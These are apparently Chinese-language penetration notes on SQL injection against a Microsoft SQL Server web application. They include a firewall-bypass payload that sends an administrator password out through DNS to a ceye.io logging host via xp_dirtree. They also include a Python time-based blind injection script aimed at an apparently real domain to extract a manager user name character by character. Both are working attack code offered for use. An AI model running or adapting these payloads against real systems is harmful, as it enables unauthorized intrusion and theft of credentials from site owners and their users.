遇到中文的列名
利用unicode 進行單字節的轉換
declare @s varchar(50);
set @s = N'拉';
select UniCode(@s),nchar(UniCode(@s));
繞狗sql 方法
利用dnslog 進行sql
1 /xx.aspx?id=1'--/%2a%0a%3bDECLARE+%40host+varchar(1024)%3bSELECT+%40host%3dCONVERT(varchar(1024),(select+top+1+user_pwd+from+gt.dbo.dt_manager+where+id=1))%2b'.czj.pw2.lf0145.ceye.io'%3bEXEC('master..xp_dirtree+"\\'%2b%40host%2b'\foobar$"')%3b--%20a%2a/
中文回顯
select nchar('21776')
URLdecode
/xx.aspx?id=1'--/* 2 ;DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 user_pwd from gt.dbo.dt_manager where id=1))+'.czj.pw2.lf0145.ceye.io';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');-- a*/
基於時間盲注腳本
import requests
import time
sqlstr=''
for i in range(1,33):
for j in range(47,130):
url="http://cxxzx.cn/xx.aspx?xx=1'--/*%0a%3bif+(ascii(substring((select+top+1+user_name+from+gt.dbo.dt_manager+where+id=1),{},1)))={}+WAITFOR+DELAY+'0%3a0%3a6'--%20a*/".format(i,j)
print url
stime = time.time()
r=requests.post(url)
etime = time.time()
if etime-stime>5:
sqlstr=sqlstr+chr(j)
print sqlstr
break
if j == 129:
quit()
print sqlstr
我